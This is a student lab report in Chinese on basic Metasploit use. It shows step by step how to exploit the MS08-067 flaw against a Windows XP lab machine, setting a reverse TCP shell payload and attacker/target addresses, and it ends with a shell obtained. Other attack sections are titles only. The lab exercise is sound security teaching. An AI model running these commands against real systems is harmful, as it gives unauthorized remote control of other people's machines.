1. 程式人生 > >20155205 郝博雅 Exp5 MSF基礎應用

20155205 郝博雅 Exp5 MSF基礎應用

客戶 IT 應用 arc console eve ons 掌握 asp

20155205 郝博雅 Exp5 MSF基礎應用

一、實驗目標

  • 本實踐目標是掌握metasploit的基本應用方式,重點常用的三種攻擊方式的思路。具體需要完成:

1.一個主動攻擊實踐,如ms08_067; (1分)

  1. 一個針對瀏覽器的攻擊,如ms11_050;(1分)

  2. 一個針對客戶端的攻擊,如Adobe;(1分)

  3. 成功應用任何一個輔助模塊。(0.5分)

基礎問題回答:用自己的話解釋什麽是exploit,payload,encode?

  • exploit相當於一個載體,把攻擊代碼運送到耙機中;payload相當於shellcode;encode一是為了避免payload中出現壞字符,從而影響payload的功能,二是為了實現免殺。

二、實驗內容

主動攻擊:ms08_067漏洞攻擊

靶機: windows XP SP3(English)

攻擊機:kali

  • 輸入msfconsole進入控制臺,輸入search ms08_067指令查詢一下針對該漏洞可以運用的攻擊模塊:

技術分享圖片

  • 輸入use exploit/windows/smb/ms08_067_netapi使用該模塊:

技術分享圖片

  • 使用show payloads查看可以供我們使用的payload並找到一個可用的攻擊載荷:

技術分享圖片

  • set payload generic/shell_reverse_tcp即tcp反向回連設置payload

  • 使用指令show options查看我們需要設置的參數,需要設置一個RHOST(靶機的IP地址)和一個LHOST(攻擊機的IP地址)。並且看到target是0,即自動選擇目標系統類型,就不用再設置了。

技術分享圖片

  • 使用set LHOST 192.168.206.129set LPORT 5205設置本機地址和端口,使用set RHOST 192.168.206.135設置耙機地址,使用show options查看設置結果:

技術分享圖片

  • 接著使用exploit指令開始攻擊,出現了一個錯誤:

技術分享圖片

  • 關閉XP的防火墻:

技術分享圖片

  • 攻擊成功,獲取了耙機的shell:

技術分享圖片

對瀏覽器攻擊:ms10_046漏洞攻擊

對Adobe的漏洞攻擊:adobe_toolbutton

輔助模塊的應用:smb_version

20155205 郝博雅 Exp5 MSF基礎應用